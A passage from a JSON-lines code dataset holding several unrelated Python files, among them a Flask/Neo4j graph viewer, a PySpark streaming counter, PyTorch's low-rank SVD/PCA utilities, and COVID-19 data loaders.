{\"source\": str(relationRecord.r.start_node.properties['id']),\n \"target\": str(relationRecord.r.end_node.properties['id']),\n \"relationship\": relationRecord.r.rel.type}\n\n return {\"data\": data}\n\n\n@app.route('/')#建立路由,指向网页\ndef index():\n return render_template('search.html')\n\n\n@app.route('/searchGraph')\ndef searchGraph():\n node = request.args.get('wd')\n print(node)\n with open(\"node.txt\", \"w\") as f:\n f.write(node)\n return render_template('index.html', node=node)\n\n#Laurence\n@app.route('/graph')#两个路由指向同一个网页,返回图的节点和边的结构体\ndef get_graph():\n # nodes = list(map(buildNodes, graph.run('MATCH (n) RETURN n').data()))\n #\n # edges = list(map(buildEdges, graph.run('MATCH ()-[r]->() RETURN r').data()))\n # # elements = {\"nodes\": nodes, \"edges\": edges}\n\n with open(\"node.txt\", \"r\", encoding='utf-8') as f:\n line = f.readlines()\n line = line[0].strip()\n print(\"1.{}\".format(line))\n #\n # with driver.session() as session:\n # # strAll = 'MATCH (p1{name:\"Laurence Fishburne\"})-[r1:ACTED_IN]->(m)<-[r2:DIRECTED]-(p2) RETURN p1,m,p2,r1,r2'\n # #\n # # print(strAll)\n # # results=session.run(strAll).values()\n # # nodeList=[]\n # # edgeList=[]\n # # for result in results:\n # # nodeList.append(result[0])\n # # nodeList.append(result[1])\n # # nodeList.append(result[2])\n # # nodeList=list(set(nodeList))\n # # edgeList.append(result[3])\n # # edgeList.append(result[4])\n # #\n # # nodes = list(map(buildNodes, nodeList))\n # # edges = list(map(buildEdges,edgeList))\n #\n # strNode = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN n,p,r LIMIT 25\"\n # # strNode = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN n,p LIMIT 25\"\n # print(strNode)\n # # nodes = list(map(buildNodes,graph.run(strNode).data()))\n #\n # nodes = []\n # for node in graph.run(strNode).data():\n # nodeResult = buildNodes(node)\n # nodes.append(nodeResult)\n #\n # strEdge = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN r LIMIT 25\"\n # # strEdge = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN r LIMIT 25\"\n # print(strEdge)\n #\n # # edges= list(map(buildEdges,graph.run(strEdge).data()))\n # edges = []\n # for edge in graph.run(strEdge).data():\n # edgeResult = buildEdges(edge)\n # edges.append(edgeResult)\n\n nodes = list(map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n')))\n edges = list(map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r')))\n\n return jsonify(elements = {\"nodes\": nodes, \"edges\": edges})\n\nif __name__ == '__main__':\n app.run(debug = True) #flask框架必备","sub_path":"front/neo4j-web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171906493","text":"import sys\n\nfrom pyspark import SparkContext # allow us to work with spark\nfrom pyspark.streaming import StreamingContext # allow to work with streams in spark\n\nif __name__ == \"__main__\":\n sc = SparkContext(\"local[2]\", \"StreamingCount\")\n sc.setLogLevel(\"WARN\")\n\n ssc = StreamingContext(sc, 2) # 2 is a batchInterval prop of the DStream created by this StreamingContext\n\n ssc.checkpoint('file:///tmp/spark')\n\n lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2])) # hostname and port\n\n counts = lines.flatMap(lambda line: line.split(\" \"))\\\n .filter(lambda word: \"ERROR\" in word)\\\n .map(lambda word: (word, 1))\\\n .reduceByKeyAndWindow(lambda a, b: a + b, lambda a, b: a - b, 20, 2)\n\n counts.pprint()\n\n ssc.start()\n ssc.awaitTermination()\n\n# ncat -lk 9999\n# spark-submit .\\reduce_by_key_and_window.py localhost 9999\n","sub_path":"reduce_by_key_and_window.py","file_name":"reduce_by_key_and_window.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"534256401","text":"# -*- coding: utf-8 -*-\n# Created by Daniel Liu on 2017/7/25\nimport datetime\nimport time\nimport traceback\n\nfrom Browser import Browser\nfrom Config import Config\nfrom MailAgent import MailAgent\nfrom lib.Log import Log\n\nreportedDates = {'RMIT': [], 'PEARSON': [], 'CLIFTON': []}\n\n\ndef compareDate(reported, result):\n return reported[\"year\"] == result[\"year\"] and \\\n reported[\"month\"] == result[\"month\"] and \\\n reported[\"day\"] == result[\"day\"]\n\n\ndef processRetrievedData(data, config, log):\n message = \"Available Dates: \\n\"\n needReport = False\n for testCenter in [\"RMIT\", \"PEARSON\", \"CLIFTON\"]:\n # First remove disappeared dates\n for reportedDate in reportedDates[testCenter]:\n needRemove = True\n for result in data[testCenter]:\n if compareDate(reportedDate, result):\n needRemove = False\n if needRemove:\n reportedDates[testCenter].remove(reportedDate)\n # Then determine whether there are dates that needs to be reported\n tomorrow = datetime.date.today() + datetime.timedelta(1)\n for result in data[testCenter]:\n if config.isOnlyReportSpecificMonth() and result['month'] != config.getSpecificMonth():\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if config.isOnlyReportCurrentMonth() and result[\"month\"] != tomorrow.month:\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if (not config.isReportWithin24HoursAppointments()) and result['day'] == tomorrow.day + 1:\n log.info('Within 24 Hours: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n message += \"{0}: {1}-{2}-{3} \\n\".format(testCenter, result[\"year\"], result[\"month\"], result[\"day\"])\n if len(reportedDates[testCenter]) == 0:\n reportedDates[testCenter].append(result)\n needReport = True\n for reportedDate in reportedDates[testCenter]:\n if compareDate(reportedDate, result):\n continue\n else:\n reportedDates[testCenter].append(result)\n needReport = True\n return message, needReport\n\ndef main():\n logger = Log(\"PTE-ACC\", \"PTEChecker.log\", \"Logs\")\n config = Config(\"PTEChecker.conf\", logger)\n while True:\n try:\n mailAgent = MailAgent(config, logger)\n browser = Browser(config, logger)\n data = browser.startRetrieveData()\n message, needReport = processRetrievedData(data, config, logger)\n if needReport:\n mailAgent.sendEmail(message)\n logger.debug('Message has been sent.')\n if not needReport:\n logger.info('No desired dates.')\n logger.info('Routine check finished.')\n time.sleep(config.getScanIntervals())\n\n except Exception as e:\n logger.error('Error occurred: {0}'.format(e))\n logger.error(traceback.format_exc())\n continue\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"267164924","text":"from .shape import ShapeStructs as ss\r\nfrom .piece import Piece\r\n\r\nclass Player:\r\n\r\n def __init__(self, color, pieceSet):\r\n self.color = color\r\n self.pieceSet = []\r\n for pieceInstructions in pieceSet:\r\n self.pieceSet.append(pieceInstructions)\r\n\r\n def removePiece(self, piece):\r\n for pieceObj in self.pieceSet:\r\n if pieceObj.id == piece.id:\r\n self.pieceSet.remove(pieceObj)\r\n\r\n def piecesAsString(self):\r\n toReturn = ''\r\n divider = ''\r\n for piece in self.pieceSet:\r\n toReturn += divider\r\n toReturn += piece.id\r\n divider = ','\r\n return toReturn\r\n\r\n def validatePlayerHasPiece(self, piece):\r\n playerHasPlayedPiece = True\r\n for myPiece in self.pieceSet:\r\n if piece.id == myPiece.id:\r\n playerHasPlayedPiece = False\r\n\r\n if playerHasPlayedPiece:\r\n raise PieceHasBeenPlacedError(\"This piece has been placed\")\r\n\r\nclass Error(Exception):\r\n pass\r\n\r\nclass PieceHasBeenPlacedError(Error):\r\n def __init__(self, message):\r\n self.message = message","sub_path":"backup/blockoo/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"542137854","text":"#!/usr/bin/python\n\nfilerow = []\nrowline = []\ncrimefile = open(\"tahoe-r.txt\", 'r')\nfor line in crimefile.readlines():\n\tline = line.strip()\n\trowline = line.split(\" \")\t\n\tfilerow.append(rowline)\nfilerwo_len = len(filerow)\n\nfilerow2 = []\nrowline2 = []\n\nfor i in range(len(filerow)):\n\trowline2 = []\n\tif( i > 9):\n\t\trowline2.append(filerow[i][1])\n\t\tduration = (80000/(float(filerow[i][1]) -float(filerow[i - 10][1])))\n\t\trowline2.append(duration)\n\t\tfilerow2.append(rowline2)\n\noutput = open(\"tahoe-thr.txt\", 'w')\n\nstring =\"\"\nfor item in filerow2:\n\tstring = str(item[0]) +\" \" + str(item[1]) \t\n\toutput.write(\"%s\\n\" % string)\n\nprint (filerow)\n","sub_path":"CS-252-ComputerNetworksLab/11/tahoe-thr.py","file_name":"tahoe-thr.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"652604716","text":"\"\"\"\nGiven an array of integers, find out whether there are two distinct indices i and j in the array such that the absolute difference between nums[i] and nums[j] is at most t and the absolute difference between i and j is at most k.\n\nExample 1:\n Input: nums = [1,2,3,1], k = 3, t = 0\n Output: true\n\nExample 2:\n Input: nums = [1,0,1,1], k = 1, t = 2\n Output: true\n\nExample 3:\n Input: nums = [1,5,9,1,5,9], k = 2, t = 3\n Output: false\n\"\"\"\n\n\n# too slow\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n print(unique_nums)\n\n for unique_num in unique_nums:\n print(unique_num)\n\n for new_unique_num in unique_nums:\n if abs(new_unique_num - unique_num) <= t:\n\n if new_unique_num == unique_num:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n for j in range(i + 1, len(unique_nums[unique_num])):\n if unique_nums[unique_num][j] - unique_nums[unique_num][i] <= k:\n return True\n else:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n print(\"i: \"+str(i))\n for j in range(0, len(unique_nums[new_unique_num])):\n print(\"j: \" + str(j))\n if abs(unique_nums[unique_num][i] - unique_nums[new_unique_num][j]) <= k:\n return True\n return False\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n # store the nums and their position into a dict\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n\n print(unique_nums)\n # sort the keys of the dict\n sorted_keys = sorted(unique_nums)\n # the number of distinct keys\n num_of_unique = len(sorted_keys)\n print(sorted_keys)\n\n # iterate through the sorted keys to find out the result\n for i in range(0, num_of_unique):\n i_list = unique_nums[sorted_keys[i]]\n print(i_list)\n for j in range(i, num_of_unique):\n # check if the difference of two keys is at most t\n if sorted_keys[j] - sorted_keys[i] <= t:\n print(sorted_keys[j] - sorted_keys[i])\n # check if there are two indexs which have a difference at most k\n if i == j:\n for index in range(0, len(i_list)-1):\n if i_list[index + 1] - i_list[index] <= k:\n return True\n else:\n for index_i in i_list:\n for index_j in unique_nums[sorted_keys[j]]:\n if abs(index_i - index_j) <= k:\n return True\n else:\n # break the loop\n break\n return False\n\n\ninput1 = [1,2,3,1]\nk1 = 3\nt1 = 0\n\ninput2 = [1,0,1,1]\nk2 = 1\nt2 = 2\n\ninput3 = [1,5,9,1,5,9]\nk3 = 2\nt3 = 3\n\ninput4 = [10,100,11,9,100,10]\nk4 = 1\nt4 = 2\n\nprint(containsNearbyAlmostDuplicate(input3, k3, t3))\n\n","sub_path":"LeetCode-Python/220 Contains Duplicate III.py","file_name":"220 Contains Duplicate III.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264528712","text":"\"\"\"Implement various linear algebra algorithms for low rank matrices.\n\"\"\"\n\n__all__ = ['svd_lowrank', 'pca_lowrank']\n\nfrom typing import Tuple, Optional\n\nimport torch\nfrom torch import Tensor\nfrom . import _linalg_utils as _utils\nfrom ._overrides import has_torch_function, handle_torch_function\n\n\ndef get_approximate_basis(A, # type: Tensor\n q, # type: int\n niter=2, # type: Optional[int]\n M=None # type: Optional[Tensor]\n ):\n # type: (...) -> Tensor\n \"\"\"Return tensor :math:`Q` with :math:`q` orthonormal columns such\n that :math:`Q Q^H A` approximates :math:`A`. If :math:`M` is\n specified, then :math:`Q` is such that :math:`Q Q^H (A - M)`\n approximates :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 4.4 from\n Halko et al, 2009.\n\n .. note:: For an adequate approximation of a k-rank matrix\n :math:`A`, where k is not known in advance but could be\n estimated, the number of :math:`Q` columns, q, can be\n choosen according to the following criteria: in general,\n :math:`k <= q <= min(2*k, m, n)`. For large low-rank\n matrices, take :math:`q = k + 5..10`. If k is\n relatively small compared to :math:`min(m, n)`, choosing\n :math:`q = k + 0..2` may be sufficient.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int): the dimension of subspace spanned by :math:`Q`\n columns.\n\n niter (int, optional): the number of subspace iterations to\n conduct; ``niter`` must be a\n nonnegative integer. In most cases, the\n default value 2 is more than enough.\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n \"\"\"\n\n niter = 2 if niter is None else niter\n m, n = A.shape[-2:]\n dtype = _utils.get_floating_dtype(A)\n matmul = _utils.matmul\n\n R = torch.randn(n, q, dtype=dtype, device=A.device)\n\n A_H = _utils.transjugate(A)\n if M is None:\n (Q, _) = matmul(A, R).qr()\n for i in range(niter):\n (Q, _) = matmul(A_H, Q).qr()\n (Q, _) = matmul(A, Q).qr()\n else:\n M_H = _utils.transjugate(M)\n (Q, _) = (matmul(A, R) - matmul(M, R)).qr()\n for i in range(niter):\n (Q, _) = (matmul(A_H, Q) - matmul(M_H, Q)).qr()\n (Q, _) = (matmul(A, Q) - matmul(M, Q)).qr()\n\n return Q\n\n\ndef svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Return the singular value decomposition ``(U, S, V)`` of a matrix,\n batches of matrices, or a sparse matrix :math:`A` such that\n :math:`A \\approx U diag(S) V^T`. In case :math:`M` is given, then\n SVD is computed for the matrix :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 5.1 from\n Halko et al, 2009.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n .. note:: The input is assumed to be a low-rank matrix.\n\n .. note:: In general, use the full-rank SVD implementation\n ``torch.svd`` for dense matrices due to its 10-fold\n higher performance characteristics. The low-rank SVD\n will be useful for huge sparse matrices that\n ``torch.svd`` cannot handle.\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of A.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n if not torch.jit.is_scripting():\n tensor_ops = (A, M)\n if (not set(map(type, tensor_ops)).issubset((torch.Tensor, type(None))) and has_torch_function(tensor_ops)):\n return handle_torch_function(svd_lowrank, tensor_ops, A, q=q, niter=niter, M=M)\n return _svd_lowrank(A, q=q, niter=niter, M=M)\n\n\ndef _svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n q = 6 if q is None else q\n m, n = A.shape[-2:]\n matmul = _utils.matmul\n if M is None:\n M_t = None\n else:\n M_t = _utils.transpose(M)\n A_t = _utils.transpose(A)\n\n # Algorithm 5.1 in Halko et al 2009, slightly modified to reduce\n # the number conjugate and transpose operations\n if m < n:\n # computing the SVD approximation of a transpose in order to\n # keep B shape minimal\n Q = get_approximate_basis(A_t, q, niter=niter, M=M_t)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B_t = matmul(A, Q_c)\n else:\n B_t = matmul(A, Q_c) - matmul(M, Q_c)\n U, S, V = torch.svd(B_t)\n V = Q.matmul(V)\n else:\n Q = get_approximate_basis(A, q, niter=niter, M=M)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B = matmul(A_t, Q_c)\n else:\n B = matmul(A_t, Q_c) - matmul(M_t, Q_c)\n U, S, V = torch.svd(_utils.transpose(B))\n U = Q.matmul(U)\n\n return U, S, V\n\n\ndef pca_lowrank(A, q=None, center=True, niter=2):\n # type: (Tensor, Optional[int], bool, int) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Performs linear Principal Component Analysis (PCA) on a low-rank\n matrix, batches of such matrices, or sparse matrix.\n\n This function returns a namedtuple ``(U, S, V)`` which is the\n nearly optimal approximation of a singular value decomposition of\n a centered matrix :math:`A` such that :math:`A = U diag(S) V^T`.\n\n .. note:: The relation of ``(U, S, V)`` to PCA is as follows:\n\n - :math:`A` is a data matrix with ``m`` samples and\n ``n`` features\n\n - the :math:`V` columns represent the principal directions\n\n - :math:`S ** 2 / (m - 1)` contains the eigenvalues of\n :math:`A^T A / (m - 1)` which is the covariance of\n ``A`` when ``center=True`` is provided.\n\n - ``matmul(A, V[:, :k])`` projects data to the first k\n principal components\n\n .. note:: Different from the standard SVD, the size of returned\n matrices depend on the specified rank and q\n values as follows:\n\n - :math:`U` is m x q matrix\n\n - :math:`S` is q-vector\n\n - :math:`V` is n x q matrix\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments:\n\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of\n :math:`A`. By default, ``q = min(6, m,\n n)``.\n\n center (bool, optional): if True, center the input tensor,\n otherwise, assume that the input is\n centered.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2.\n\n References::\n\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n\n if not torch.jit.is_scripting():\n if type(A) is not torch.Tensor and has_torch_function((A,)):\n return handle_torch_function(pca_lowrank, (A,), A, q=q, center=center, niter=niter)\n\n (m, n) = A.shape[-2:]\n\n if q is None:\n q = min(6, m, n)\n elif not (q >= 0 and q <= min(m, n)):\n raise ValueError('q(={}) must be non-negative integer'\n ' and not greater than min(m, n)={}'\n .format(q, min(m, n)))\n if not (niter >= 0):\n raise ValueError('niter(={}) must be non-negative integer'\n .format(niter))\n\n dtype = _utils.get_floating_dtype(A)\n\n if not center:\n return _svd_lowrank(A, q, niter=niter, M=None)\n\n if _utils.is_sparse(A):\n if len(A.shape) != 2:\n raise ValueError('pca_lowrank input is expected to be 2-dimensional tensor')\n c = torch.sparse.sum(A, dim=(-2,)) / m\n # reshape c\n column_indices = c.indices()[0]\n indices = torch.zeros(2, len(column_indices),\n dtype=column_indices.dtype,\n device=column_indices.device)\n indices[0] = column_indices\n C_t = torch.sparse_coo_tensor(\n indices, c.values(), (n, 1), dtype=dtype, device=A.device)\n\n ones_m1_t = torch.ones(A.shape[:-2] + (1, m), dtype=dtype, device=A.device)\n M = _utils.transpose(torch.sparse.mm(C_t, ones_m1_t))\n return _svd_lowrank(A, q, niter=niter, M=M)\n else:\n c = A.sum(dim=(-2,)) / m\n C = c.reshape(A.shape[:-2] + (1, n))\n ones_m1 = torch.ones(A.shape[:-1] + (1, ), dtype=dtype, device=A.device)\n M = ones_m1.matmul(C)\n return _svd_lowrank(A - M, q, niter=niter, M=None)\n","sub_path":"torch/_lowrank.py","file_name":"_lowrank.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385738780","text":"import re\nfrom itertools import islice\n\nimport pandas as pd\n\nfrom . import helpers\n\nclass Record():\n def __init__(self, string):\n self.__dim= 0\n self.__size = 0\n self.__schema = None\n self.__data = {}\n\n string = string[9:-1] # Trim '(Record ...)'\n self.parse_input_string(string)\n\n def __str__(self):\n return \"\"\"Record:\n dim: {}\n size: {}\n schema: {}\n data: {}\n \"\"\".format(self.dim, self.size, self.schema, self.data)\n\n @property\n def dim(self):\n return self.__dim\n\n @property\n def size(self):\n return self.__dim\n\n @property\n def schema(self):\n return self.__schema\n\n @property\n def data(self):\n return self.__data\n\n def clean_freq_data(self):\n # In the files used as reference when creating this every record\n # contained a list of all the frequency points. This is nonsense\n if \"Freq\" not in self.__data:\n raise KeyError(\"Data does not contain frequency field\")\n\n self.data[\"Freq\"] = self.data[\"Freq\"][0]\n\n def parse_input_string(self, string):\n data_re = re.compile(r'\\(data[\\s\\S]+\\)')\n matches = re.search(data_re, string)\n if data_re:\n data = matches.group(0)\n data = data[4:-1] # strip \"(data ...)\"\n string = re.sub(data_re, '', string)\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n \n if keyword == 'schema':\n self.__schema = Schema(string[i:end+1])\n for key in self.schema.fields.keys():\n self.__data[key] = []\n skip = end-i\n next(islice(it, skip, skip), None)\n\n elif keyword == 'numDims':\n self.__dim = statement[1]\n \n elif keyword == 'size':\n self.__size = statement[1]\n\n else:\n raise KeyError('Unexpected keyword: {}'.format(statement[0]))\n\n record_locs = [x.start() for x in re.finditer('\\((record)', data)]\n records = []\n for i, _ in enumerate(record_locs):\n if i == len(record_locs)-1:\n records.append(data[record_locs[-1]:-2])\n else:\n records.append(data[record_locs[i]:record_locs[i+1]-2])\n\n for record in records:\n record_dict = self.parse_record(record)\n\n def parse_record(self, record):\n record = record[7:-1] # strip \"(record ...)\"\n fields = re.findall('\\(([^)]+)', record)\n for field in fields:\n field_name = re.search('\\\"\\w+\\\"', field).group(0).strip('\"')\n list_search = re.search('\\[.*\\]', field) \n number_search = re.search('-?\\d+\\.?\\d*', field)\n\n # This converts the freqs to floats which is okay but maybe not ideal\n if list_search:\n field_val = list_search.group(0)\n field_val = re.sub('[\\[\\]]', '', field_val).strip()\n field_val = [float(x) for x in field_val.split()]\n elif number_search:\n field_val = number_search.group(0)\n field_val = float(field_val)\n\n self.__data[field_name].append(field_val)\n \n def to_dataframes(self):\n proper_keys = (\"Mag\", \"Phase\", \"Vpos\", \"Hpos\", \"HV\", \"Freq\")\n if not all(k in self.data.keys() for k in proper_keys):\n raise KeyError(\"Record does not contain the correct keys: {}\".format(self.data.keys()))\n \n pos = list(zip(self.data[\"Vpos\"], self.data[\"Hpos\"]))\n dataframes = {}\n for i, freq in enumerate(self.data[\"Freq\"]):\n mags = [mag[i] for mag in self.data[\"Mag\"]]\n phases = [phase[i] for phase in self.data[\"Phase\"]]\n df = pd.DataFrame({'Position': pos, 'Mag': mags, 'Phase': phases})\n dataframes['{}'.format(freq)] = df\n\n return dataframes\n\n\n\nclass Schema():\n def __init__(self, string):\n self.__numFields = 0\n self.__fields = {}\n\n string = string[7:-1] # strip \"(schema ...)\"\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n\n if keyword == 'numFields':\n self.__numFields = statement[1]\n\n elif keyword == 'fieldName':\n self.new_field(string[i:end+1])\n skip = end-i\n next(islice(it, skip, skip), None)\n\n else:\n raise NotImplementedError('{} is not yet implemented\\n\\tFull statement: {}'.format(keyword, statement))\n\n def __str__(self):\n return \"\"\"\n numFields: {}\n fields: {}\n \"\"\".format(self.__numFields, self.__fields)\n\n @property\n def fields(self):\n return self.__fields\n\n @property\n def numFields(self):\n return self.__numFields\n\n def new_field(self, string):\n string = string[10:-1]\n fields = [s.strip().split() for s in re.split(r'[()]', string) if not s.isspace()]\n fieldname = fields[0][0].strip('\"')\n fields = fields[1:]\n temp = {}\n for field in fields:\n temp[field[0]] = field[1]\n\n self.__fields[fieldname] = temp\n\n\n\n \n","sub_path":"chamberplot/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521081280","text":"import pandas as pd\nimport numpy as np\nfrom lmfit.models import StepModel\nimport os.path\n\ncases = 'https://covid.ourworldindata.org/data/ecdc/total_cases.csv'\ndeaths = 'https://covid.ourworldindata.org/data/ecdc/total_deaths.csv'\nUS_cases = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_confirmed_US.csv\"\nUS_deaths = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\"\n\n\ndef state(s):\n return f'http://covidtracking.com/api/v1/states/{s}/daily.csv'\n\n\ndef date_to_int(s: str):\n padded = [x.zfill(2) for x in s.split('/')]\n return int(''.join([padded[i] for i in [2, 0, 1]]))\n\n\ndef date_to_str(d):\n s = str(d)\n s = [s[i:i + 2] for i in range(0, len(s), 2)]\n s[0] = \"20\" + s[0]\n return '-'.join(s)\n\n\ndata = dict()\ndata2 = dict()\n\npreds = dict()\n\nstate_data = dict()\n\nUS_data = dict()\nUS_data2 = dict()\n\npopulation_state = dict()\npopulation_county = dict()\n\n\ndef get_data(date):\n if date in data:\n return data[date]\n elif os.path.isfile(f\"assets/cases/df_{date}.csv\"):\n df = pd.read_csv(f\"assets/cases/df_{date}.csv\")\n data[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(cases)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n df.to_csv(f\"assets/cases/df_{len(df.index) - 1}.csv\")\n data[len(df.index) - 1] = df\n return df\n\n\ndef get_data2(date):\n if date in data2:\n return data2[date]\n elif os.path.isfile(f\"assets/deaths/df2_{date}.csv\"):\n df = pd.read_csv(f\"assets/deaths/df2_{date}.csv\")\n data2[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(deaths)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n df.to_csv(f\"assets/deaths/df2_{len(df.index) - 1}.csv\")\n data2[len(df.index) - 1] = df\n return df\n\n\ndef get_us_data(date):\n if date in US_data:\n df = US_data[date]\n return df\n elif os.path.isfile(f\"assets/john_hopkins/cases_{date}.csv\"):\n df = pd.read_csv(f\"assets/john_hopkins/cases_{date}.csv\", index_col=0)\n US_data[date] = df\n return df\n else:\n print(\"Getting data...\")\n df = pd.read_csv(US_cases)\n df.columns.values[11:] = df.columns[11:].map(date_to_int).values\n df = df.T[np.concatenate([np.array([True] * 11), df.T.index[11:] <= date])].T\n US_data[df.columns[-1]] = df\n df.to_csv(f\"assets/john_hopkins/cases_{df.columns[-1]}.csv\")\n return df\n\n\ndef get_us_data2(date):\n if date in US_data2:\n df2 = US_data2[date]\n return df2\n elif os.path.isfile(f\"assets/john_hopkins/deaths_{date}.csv\"):\n df2 = pd.read_csv(f\"assets/john_hopkins/deaths_{date}.csv\", index_col=0)\n US_data2[date] = df2\n return df2\n else:\n print(\"Getting data...\")\n df2 = pd.read_csv(US_deaths)\n df2.columns.values[12:] = df2.columns[12:].map(date_to_int).values\n df2 = df2.T[np.concatenate([np.array([True] * 12), df2.T.index[12:] <= date])].T\n US_data2[df2.columns[-1]] = df2\n df2.to_csv(f\"assets/john_hopkins/deaths_{df2.columns[-1]}.csv\")\n return df2\n\n\ndef get_state_data2(s: str, date: int):\n s = s.upper()\n if (s, date) in state_data:\n return state_data[(s, date)]\n elif os.path.isfile(f\"assets/state/df_{s}_{date}.csv\"):\n df = pd.read_csv(f\"assets/state/df_{s}_{date}.csv\", index_col=0)\n state_data[(s, date)] = df\n else:\n print('Getting File...')\n df = pd.read_csv(state(s))\n df = df[df['date'] >= 20200304]\n df = df[df['date'] <= date]\n df = pd.DataFrame(df.values[::-1], range(len(df.index)), df.columns)\n df = df.fillna(0)\n df.to_csv(f\"assets/state/df_{s}_{df['date'].iloc[-1]}.csv\")\n state_data[(state, date)] = df\n return df\n\n\ndef get_state_data(s: str, date: int):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[df['Province_State'] == s].sum(), df2[df2['Province_State'] == s].sum()],\n axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_state[s] = tmp.iloc[-1, 1]\n return tmp.iloc[11:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_state_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef 